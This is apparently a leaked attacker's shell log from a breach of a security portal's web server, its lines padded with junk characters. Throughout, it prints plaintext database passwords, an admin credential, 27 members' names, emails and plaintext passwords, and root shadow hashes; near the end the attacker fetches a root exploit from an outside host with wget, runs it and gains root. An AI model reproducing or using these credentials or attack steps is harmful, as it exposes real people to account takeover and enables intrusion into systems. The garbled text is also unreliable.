3 G+ u1 ?6 N% v/ Q- E+ ydrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007
- o" G, z( c; Ddrwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql7 G3 q+ ]0 ?$ y/ @0 e
drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com# o+ [6 Y+ G: M- a8 K
drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend" U: G- Q' u c9 M7 I/ h
drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner7 q# Y1 N3 d5 m0 a
-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg
0 s, ]+ O& c! sdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config
. y% \# ^5 i- x4 ~/ W6 C( Ndrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron
Z# F4 g% g8 \+ s! n; o: Qdrwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd
: j% y1 E# p7 \-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php8 h3 I, g$ l/ p) N* o- D
-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico, B8 \2 l) B2 W
drwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed
$ O8 ^" v! _/ S |6 Wdrwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour
4 T6 y2 B8 _4 B0 m- V- G, B-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess, m3 c$ ~' G- ]( W3 e
-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess R, r' V) W7 i7 b) U2 z% s& D
-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php
! W2 J8 M9 S( n' z) a Q4 }& [-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html. k# m( ~3 n$ h2 G& n
-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php
3 l `5 t1 ~/ U' D-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php
. f& A: r" Y- u-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf( U; K. B2 m0 K% [9 f5 E, b
drwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc9 ]! c6 c; q* e, w0 P( {: b
drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang
' F8 s4 {* m; h1 E/ i6 |" m6 Gdrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib) e2 k( b$ g6 | j2 }0 |
drwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log
4 q) r0 X& i4 J& A. W0 h" P+ Z4 Sdrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member4 I7 W8 l) ?/ ^: M$ J
drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata
! @% c2 b4 i+ s6 p6 m$ `0 O5 hdrwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new
& V4 a: z- R+ f' C! G* Z& W9 G* A7 J-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf
# ~0 A7 _5 g, o" K7 @. y8 e+ [. _drwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re& G& Y8 f1 t) k) P6 V# n2 X7 q, ^
-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt
* E4 v& V6 U0 U+ y7 }9 bdrwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss* O2 p8 s; C; O7 _, J( U6 s
drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources
1 I2 i% P v, O. \) I fdrwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com5 Q9 t; E1 o9 H' R+ z
drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes
. ?- X- Q1 u. o5 L0 udrwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src
. }$ ? S+ _! P( d( gdrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl& B) L" c F; ]: R! j8 s6 V4 p
drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2
$ X0 M7 I G- P5 X4 }drwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old) o. j1 g& p" Y+ a% V
-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php# y: `+ I# z! R( O
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki0 [0 e1 c# a8 h+ W
6 ^ d3 b5 W+ \- P8 Nsh-3.2$ head -20 index.php
$ O/ b3 S8 {' e! h<?PHP: j ]" I0 ]8 ]- ]( M, }7 w
/**
6 v) f$ E2 m; N* Mainfile (external) for astalavistaNET v2.0" J/ v" s( @7 f P& y
*- q: n- ~, A% M+ P1 L' f0 R
* @copyright Astalavista IT Engineering GmbH$ ~$ o% ~# v0 ]" J o8 E
* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>
2 q" j3 ^4 m, L, Q6 i( ]# \; A/ W* @version 1.0
) A- e z# z$ `. ?*/( i/ @/ T+ P8 L3 j! j
& R4 \ i# r0 m3 ?# m* j% }
if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {
$ g% k7 U5 J H $dontStartSession = false;
* Y; i) F1 a, M# i5 {5 F _( V, K2 V } else {
- L2 I% c2 E6 m* G' u4 q. e $dontStartSession = true;
5 N/ q }. E2 e5 m }% p& ^' s Q0 y8 V! a1 K- Q. Y
require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);
* M' |* c i2 r1 B require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);
: }2 ?. H4 S6 b2 T5 K2 P/ Y require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);: V" L, t* H& G
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);0 g% e z# z- g# \& }" \; [) Z" i
8 h# f+ w% q# X9 ~
sh-3.2$ cd config7 Q* j" q1 `; `8 d4 }: @
sh-3.2$ ls -la7 w# g' u' R( i9 s
total 32, q- Y$ p! {0 b. v) C" t
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .
% b. s( L* T; ~) v& y* qdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ../ j4 ]" o2 B. ]3 Y+ F" c
-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php% f( W( e: C E/ [" p3 s
-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php' b# E" s. r8 b4 [
-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php
9 u+ k: s4 F2 g5 j8 w& L-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php
9 f) r, t) G3 k- ?6 V-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php
B7 B9 V) `& u4 r$ R4 K$ L) Q9 Z- M2 t( Z* C: s
sh-3.2$ cat com.conf.php2 c2 q6 ~( @5 r
[snip]
: q4 ~4 j% X& b2 y/ R5 F6 @//member-database
6 W( G" L# p, }4 `+ e4 @6 b$_CONFIG['db_mem_server'] = ‘localhost’;2 O" d1 Q+ u6 i8 {( v3 c
$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;
, P" T2 g0 D! c3 D$_CONFIG['db_mem_user'] = ‘astanet_db’;
, n2 h6 c7 ^4 C% a( _$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;+ O4 `+ p- V) _$ K r6 H* s& {, ]$ [
$_CONFIG['db_mem_debug'] = false; //true or false
8 S- |+ g5 b7 l9 q1 l//ads-database; d6 g( o( T3 [0 ]$ o7 \
$_CONFIG['db_ads_server'] = ‘localhost’;
7 [8 \, o; S! G# A' i$_CONFIG['db_ads_database'] = ‘astanet_ads’;
M2 ~2 Q* w2 F3 v# o2 A% j$_CONFIG['db_ads_user'] = ‘astanet_db’;1 B$ r9 U3 v k" z. y+ M! _- p
$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;& P5 A8 c/ \5 G3 H
$_CONFIG['db_ads_debug'] = false; //true or false
* P" K/ w3 v; }//rainbow-database
1 D O& F- M& c+ Q9 X( P$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;: T" l2 Y* S, G( B- p0 W- P; }
$_CONFIG['db_rainbow_database'] = ‘rainbow’;, e) N% n+ C# v. R
$_CONFIG['db_rainbow_user'] = ‘dinu’;* s7 ~& ?; s/ r. U
$_CONFIG['db_rainbow_password'] = ‘dinudinu’;. u% j- P5 c o+ z8 X
$_CONFIG['db_rainbow_debug'] = false; //true or false
& ^8 k! j8 w* ]2 ]4 N; K//mailing lists database
) I7 E0 k: H+ c$_CONFIG['db_mailing_lists_server'] = ‘localhost’;; y( I' j! v7 h1 C) U7 J
$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;* b- O E$ e( @1 X- y0 m
$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;" t0 d, A4 T& z6 ?3 {
$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;
4 H& e8 C; J- C* d; G) R1 p% j' h$_CONFIG['db_mailing_lists_debug'] = false; //true or false6 \1 J. Z- A6 [
//paypal \( A$ U7 m) y* @* Z9 Q, m; Q
$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;
* j4 N9 v7 r- v t: x' c5 v8 z$_CONFIG['sub_pp_cmd'] = ‘_xclick’;1 e6 i+ B# i1 ]
$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;5 [# F: \- A2 p7 c, h
$_CONFIG['sub_pp_noship'] = ‘1′;! ~# m* g# V* `* p$ f3 n
$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;- p. O1 H3 \2 K% S* I- ^( B- H9 d# @
[snip]1 l* w1 y2 ?( r$ G' g
- E$ D& |- @0 L6 R8 k. i$ e1 p: L4 ksh-3.2$ cd ..
6 h0 o7 c' `" a! D* S$ r1 ^sh-3.2$ cd member. w$ O) } l& @. l h( n2 ~. E
sh-3.2$ ls -la. c4 ~- R! d) E, c X' z
total 20
- a# N) Y7 ~; y9 R; n* J6 ]- gdrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .
+ W: ?; F% Q$ F4 Rdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
( ]$ m1 \$ l& ^4 Z( L9 A# F-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess$ W) a; J( f. G- X$ P
-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php3 Q" b: y% _0 a! F( w
sh-3.2$ cat .htaccess
, q. f3 O& o9 t; HSecFilterEngine off9 T2 ~$ J2 Y0 \. I
; D8 A5 u- f1 V& C# u8 }6 F" g/ Psh-3.2$ cd ..
! k; y& s, A5 t' T" _& ^* Wsh-3.2$ cd cron2 U5 D6 e9 o$ U: O
sh-3.2$ ls -la% I, s1 ~5 |8 G# |
total 1688 Q( T; w9 t) w. T
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .! @) v, H- t: k4 Y7 Q+ [6 b
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..: t4 j) K6 d( j! I' P$ _" \
-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php! x, A4 w) U" {- o# a6 ~( x5 y
-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php0 {( v) A7 y2 _" Q H# t
-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php
% m0 R+ R5 ^7 r/ L! Q" i M% m-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php! z0 X6 s% r) N3 Y! t$ f C0 s
-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php
5 G6 m9 ]1 t0 m) s: S: L& f% I-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php/ [# w0 T4 o3 ]% u" `
-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php
5 l8 R" e' v3 b" v7 M9 e' X-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php
/ Q j, p5 Y: C: w1 M-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh
6 q5 u2 t" e6 U9 V9 u-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php' u5 j5 x* s2 S5 S. t3 I
-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php
8 W+ Y% W; `5 g" m% { X2 P-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php8 @. v% b' ]2 Z% S, \
-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh
8 ^5 q, y& {: ^: G" q" Q- |-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php
* i) ?$ Y5 ^, ]8 ]6 t-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php, I d, F! s' J) N+ S
-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php
& k2 c5 E' F. r6 d3 A( F% g" B-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php0 C0 \% z. K! v4 H
-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php
: x- B" A5 w+ v4 a" {: L4 Udrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email3 a, N1 b# y' V. ~& y# K3 N5 V
-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php
9 [8 _ Q) }; q" M4 g0 q-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php
' @; J. x8 k% `& s
( ~. _" }* e3 c2 \ Ysh-3.2$ cd ..# P& A/ F" k+ Z# I' ]
sh-3.2$ cd _007
/ c; u( h" H$ u! e5 S- nsh-3.2$ ls -la* N; f M2 p( D7 i: b) F- _
total 24
( B5 U, L f6 v% t- M3 f; T- pdrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .! P6 {7 ]/ Z6 w) y( m
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
2 \- i5 d; B+ p* Z-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess0 U3 N- v) W( ~# e. y |( a
-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php
4 O* \6 W* S2 w+ m& a" G! N i-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php5 U0 e B+ T# j" ?& `$ f$ z1 d
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap
; [4 ~* K, M2 w3 |5 F; w7 r3 ] [$ f. E8 Q/ N
sh-3.2$ cat .htaccess
! U3 H) |/ @8 k. S$ C; fauthType Basic
( ^. q2 e. K/ WauthName Admin$ P# w3 f8 l+ R: B. m$ ~/ ? d) l5 m7 t* X
authUserFile /home/astanet/auth/.htadm_pwd0 r+ a8 J, x& N! D
require valid-user Y9 |9 a6 X% @. m4 v
# k5 }" \1 D8 [0 C$ R& i
sh-3.2$ cat /home/astanet/auth/.htadm_pwd5 Y/ v# x" Q) N
admin2net:CR0bl65MwhfT
9 V# e4 u' t( l* S$ t
6 p9 ?6 b0 S7 L' A( Q6 ysh-3.2$ mysql -u astanet_db -p9 t/ j% X$ F A& N
Enter password:& q' {' f0 C# s, n
Welcome to the MySQL monitor. Commands end with ; or \g.; N. ], |# q! Z" Y. q. F; T7 X8 a
Your MySQL connection id is 275153
( `$ S: L/ Q, j/ Q" K! nServer version: 5.0.45-community-log MySQL Community Edition (GPL)
/ c+ u2 ?- c; w* ^4 t8 Z
" o! g2 U# _9 ?6 FType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
1 S8 m- h# d4 ^; G- ^1 Y, a3 M/ E# g$ r, f4 [0 E3 M# d
mysql> show databases;
% Z+ A, q8 } Q6 I' k% ]7 Y/ k+———————–+, h+ n. I/ N/ D6 y. \
| Database |
: i8 F$ J- Y; }6 `/ Y; l+———————–+2 T. c8 Y7 H4 f( q) Y3 s I1 \! E- T
| information_schema |* c: z! m2 I) B5 j" s) z8 C% }
| astanet_ads |8 G& P9 z+ x4 o4 b, J
| astanet_mailing_lists |
- x- N& T' k- C9 D; b A, I& f8 u5 C4 J" O| astanet_mediawiki |
9 f4 k x6 T- N2 \| astanet_membersystem |* x: e0 G, G) C C& i: L7 f: Z, ^% U
| test |
$ S/ Z6 [! |+ H( I& C% f; m- H+———————–+
) n: Q! D7 L. f4 L% i6 rows in set (0.00 sec)
+ V; S( z: H$ O7 R Q
) V4 T! P% L( O1 x e( lmysql> use astanet_membersystem4 x8 N! E% u3 f- G3 Y" f; `' j) l
Database changed$ Q8 T# C. R+ I1 X
mysql> show tables;
F) e& @% J/ F7 n+ u0 L z+———————————–+
( j, X) _0 R# l# _* g, [| Tables_in_astanet_membersystem |# S/ S4 I" z/ w! o0 v
+———————————–+
1 A8 c' r; q! e9 B| blacklist_categories |' G( H4 T7 t; W
| blacklist_content |
) y8 ?+ F: v6 d- e1 q0 H7 || blacklist_levels |7 l/ ?& P- N4 j1 e& v2 F
| blacklist_mcset |3 b! l# {: s3 S. i8 E( A, ?# ^( c4 ], j
| dir_categories |
1 I& @3 X4 P2 J# V7 j% x3 Z2 m7 j& {| dir_comments |" T# N8 s1 O0 O }& z7 Q
| dir_links |
, q8 V( U3 P3 x& p& _* Y, _| dir_temp |
7 v3 H/ S) C9 a| dir_votes |
% x- n6 I# W7 S, F4 I( C| documents |
. V( g3 v9 Q: A$ o6 i| documents_categories |" j# `) k$ V! e$ M r7 c. |; W. X
| email_content | T$ S& v" R5 p& z
| email_settings |
+ e* @! d' O& @, T5 U( ?1 B5 `| exploits |& S3 B' A4 g. _& ?
| exploits_categories |
0 g9 @" O3 c2 U% R| exploittree_categories |: X8 \2 M# N8 d( |+ v8 x# k
| exploittree_exploits |. W8 D9 l) K" I+ Y" t$ \
| home_values | ~0 ~6 E. G7 g! D1 }) v1 I( V+ l
| iso_countries |
% G% I" H) c5 M1 [" b" S: ~6 m| links_categories |
. C. T7 `5 `1 z- Q| links_records |* f) V3 R; ^) `; B
| links_unauth |
- y$ Z0 j$ ? T1 X; s| links_votes |% X, Y8 ?- `0 h/ c
| log |6 Y4 Y5 w" x+ Q! J7 X: B) A, d
| news_categories |
" W6 U2 l9 t4 g5 {& v3 || news_comments |! a! |* z4 |# Q8 G3 J
| news_emoticons |8 I$ m! w% y* K" S- _7 @ N3 c
| news_latest |
1 b0 p# N1 \* b# N' y9 X; O| news_messages |* y: X5 s: n ]8 J$ l9 Q) f. V. s: q
| news_statistics |; |, G1 f/ x4 Y
| news_votes |
2 B* J8 b& E3 U! ~3 K' U| prices_content |/ n' B! L" t w$ ?2 ^/ Y
| prices_offers |! T& Y" u8 j( E0 A. F( c- V
| rss_settings |
5 Z; D, `* H- Z8 e2 v/ I9 s$ a7 c| sessions |( P( C, h' ]+ B K( Z( ]. F7 [
| stats_signups |
! o! r* O( a2 l/ @9 ]1 H2 G+ e| u2u2 |
; P; l0 ~& g$ h6 || u2u_contact |' K7 t! G- {# v2 K" G
| u2u_settings |
1 w+ L# C( i2 ]| user_keywords_selected_categories |
* ^1 i8 S% o& _. M) x| users |! `" f) ], u2 p& I
| users_ipn_test |0 K/ |1 e. b h
| users_keyword_values |
) `# i& {" ]5 v6 G| users_profile |5 ]9 h& L) S9 B0 u
| users_temp |
. K) U2 W+ t- v3 |3 V( Y| users_upgrade |
& Y% t- V" H+ x, O) U$ _+———————————–+
' B6 A. m8 B& I5 l) J( {46 rows in set (0.00 sec)' n0 K ^/ b& r
' B% X+ j9 z$ d) N7 nmysql> describe users;
0 l* P' a D0 T3 _+ Z+————————–+————————————–+——+—–+———————+—————-+0 w0 a& ^4 s5 ?* c; v* L5 W0 A
| Field | Type | Null | Key | Default | Extra |
9 F i/ c+ g) g+————————–+————————————–+——+—–+———————+—————-+
9 |: ]0 h( F& k: x: _- |. X: h- B| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |
; N$ M9 f4 _5 b+ Y# V| user | varchar(50) | NO | | | |' F1 v( I1 n8 H; X' B" H
| nickname | varchar(30) | NO | MUL | anonymous | |
B- E2 s. p# m( P| password | varchar(30) | NO | | | |' s. E+ d3 p* D# g# G
| userlevel | tinyint(3) | YES | MUL | NULL | |+ R* q: a1 X. s
| exp | int(8) unsigned | NO | | 0 | |
( F7 b3 ]" C' ~9 q9 p8 T) X| email | varchar(50) | NO | | | |# M" z& G7 V% Y R, n. _0 u
| ip | varchar(15) | NO | | 0 | |/ {5 X6 l) o4 G, s' d
| proxy | set(’0′,’1′) | NO | | 0 | |3 ^+ Q2 g9 {6 a
| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |# h _: r7 G0 o2 B
| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |' d7 {: \' w" F, R0 d
| anz_in | tinyint(1) | NO | | -1 | |3 H1 Z: u, K: X1 w* k
| status | tinyint(1) unsigned | NO | | 0 | |: M# S; ?3 i/ |+ }3 ]0 }' u
| checked | set(’0′,’1′,’2′) | NO | | 0 | |
$ C. u$ z- n5 @, ]% i# n| freemember | set(’0′,’1′) | NO | | 0 | |
8 A) F. P" A- T9 ~0 k| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |2 K6 {+ r8 ^5 G/ @% f5 q ^6 H
| lang | tinytext | NO | | | |
" {4 c% g, p+ W4 M| adid | smallint(6) | NO | | 0 | |
' K! Z x* N K/ Y/ [1 T1 O" M* {| pp_txn_id | varchar(255) | YES | | NULL | |9 p; _) a) O% x |
| cnb_transaction_id | varchar(255) | YES | | NULL | |/ v+ Q- u1 t; K+ R3 ]) x1 N& Q2 }
| cnb_order_id | varchar(255) | YES | | NULL | |6 I. y c K! g" u4 s: G8 t
| cnb_user_id | int(11) | YES | | 0 | |
( j" Y. m+ M8 }, p) I. c6 S s, `5 m+————————–+————————————–+——+—–+———————+—————-+- c' R1 j5 Q; c' z& o" _$ }* P
22 rows in set (0.01 sec)
4 U+ @- r1 k( _' N8 m0 t' g; d1 o* c# d$ l1 h& Z4 p
mysql> select count(*) as skids from users;
0 _# H! c1 k$ g! F, f; t+——-++ E' U* D3 u! M# |
| skids |
7 m: I1 K5 L3 S1 \/ u6 B* h( x+——-+$ ?4 m" ^8 Q; g& Y |( S
| 25199 |
7 S8 { t; j$ w+——-+% h# _& \& l: e: m
1 row in set (0.00 sec)
* O' Q. H1 S+ b1 ?9 }' p
4 I7 L1 H- i! y7 L7 V- p0 Nmysql> select user,nickname,password,email from users where userlevel = 1;
6 b& x0 u; d' l" {# F8 L! _) x+————————–+———————-+——————+———————————–+# C. F$ l. Z, e% G! ]
| user | nickname | password | email |% S" i: T& ~# i H4 G2 Z* P
+————————–+———————-+——————+———————————–+
1 l: s: ]: o0 v3 s8 [| pascal | prozac | astaman3 | 链接标记info@astalavista.net |
* Q( G+ ]# ?" m( B, |2 X! q| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |+ \' h2 f _, Z+ a! b4 v' W
| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |& Y2 X* z' U) ?9 l: o' c
| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |
@( }# ]& F& W: _| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |
$ k% S4 \+ w2 z* H4 d, f| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |) s9 F6 h- F r* ]: i _/ h) }
| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |
" T- I" [. l! \| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |
; h- U6 u* m2 n| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |, W7 x- f# k; D* F' F
| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |9 H$ H3 P' R! `: w
| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |0 j* {# z l: a9 ?3 T
| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |
" ]0 ~# ~! y3 c2 I( {$ q| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |
" B2 N% W: Z5 X4 u| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |, P0 k1 M( Z/ \ n6 V3 g4 g
| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |" G1 q0 x W" Q6 _! H
| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |
* T/ R8 @9 D( R+ d2 V| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |. j9 a: Q* l; E/ Q4 D! c! {- i
| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |/ I9 ]9 |. W; C
| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |
5 W; g! |9 a# o0 s- s| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |
+ ]9 W# E! q7 j- a. v% z. w| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |- O) Y' |* w4 F# X9 `
| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |. a) L- J+ Y0 w( h4 ^- O$ U, j
| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |4 v2 G2 ]5 u8 m1 a
| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch | D" ?, _, L6 m8 X% ]
| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |4 V) f% c; y& O0 n5 F- z8 y) x4 R
| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |" L2 C7 p: p5 D1 W7 D8 W/ O6 {
| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |
" P O# U9 F q# S) A/ o+————————–+———————-+——————+———————————–+
- k/ W+ S- o' O2 m4 B27 rows in set (0.00 sec)
1 K' n e0 P) e0 \+ Z+ k
( t" k/ A- ^! [- o; m7 R5 x$ R$ gmysql> exit;
- `: U7 B) Z+ ~( l9 }" O8 sBye2 O9 r) A1 f) Y5 o* _% d. h/ U
) M: j' R$ a/ @ w, A: J' L
[~] plaintext passwords? yes,. l% y" ~" M" U. C0 Z
Those so called “security professionals” who charge you $6.66 / month to
( ^7 W1 }& n" U+ `* Lregister at their hack-proof portal, save your passwords in plaintext…
4 X& O/ ^ u: ^: y$ G W$ J: [brilliant!
/ H: h; i1 Q8 M' q# U
8 s# e6 s% s/ v n9 o[~] This been fun but we want more./ c# O% K$ x! e y7 z
4 E' y7 _9 ^+ A; ]+ r
sh-3.2$ uname -a
9 U* n6 e# Y6 V T G+ ?( ^6 sLinux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
/ a- {+ _: Z( w4 c$ k+ @sh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]
7 i3 h( u8 j5 a–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]7 `% S/ |9 Z! z( u% e( q3 v
Resolving anti.sec.labs… 13.33.33.37
% R; H$ g) \+ pConnecting to anti.sec.labs|13.33.33.37|:80… connected.
! s) f, r! V* v0 w ~+ YHTTP request sent, awaiting response… 200 OK6 B# ?2 C! R6 [) I% h
Length: 18200 (18K) [text/plain]
/ b4 M8 V! N) z; `3 h, _4 F; _# ]Saving to: `g0troot’1 {# [7 ~) V( u2 k I7 W- K
3 o; k: K0 G: B# s, m) ]
100%[=========================================================================================================================================>] 18,200 58.6K/s in
N3 K. w$ D0 K; {5 U3 [) E& h, d0.3s
$ \2 d4 N4 y7 q$ A1 U# B4 f- p. m. L1 f5 S# N1 g! z$ t% M
18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]6 r; n4 u! a, {' s% Z! W
( O# o( O1 E" w2 X( p/ a" Ksh-3.2$ ./g0troot -i x86_64, b; |, n# g& n" W$ [
[+] g0troot - anti.sec.labs
# k! S5 S) {! t) a[+] Target: 2.6.18-128.1.10.el5
2 B" R/ Z" K; d[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]# q& a; F+ d7 `
7 q! q& Q% o. ?+ F L8 J[+] r00tr00t
2 ^/ d! Q5 z8 V: U0 ?[~] Executing shell…1 ], `& x0 \- ]1 W0 ]$ o- O4 J
# y# h% L! i3 ~" k& }& Gsh-3.2# id7 Z# z9 @5 x3 b+ v
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
/ H. g3 j0 x. V, C: a
P S; ]3 n' w1 fsh-3.2# cat /etc/shadow8 w& I: u5 T8 ^! z; i6 ^3 T, V- k
root 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::
3 M" \& A2 ~3 a4 C$ G0 @[snip]
2 F j, n. P- c8 r, E0 y) F$ Oadmin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::
/ u. g7 l& p9 ^+ K# H) ?+ Bjon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::; r& o! [# l' J. `+ D/ m* k0 b
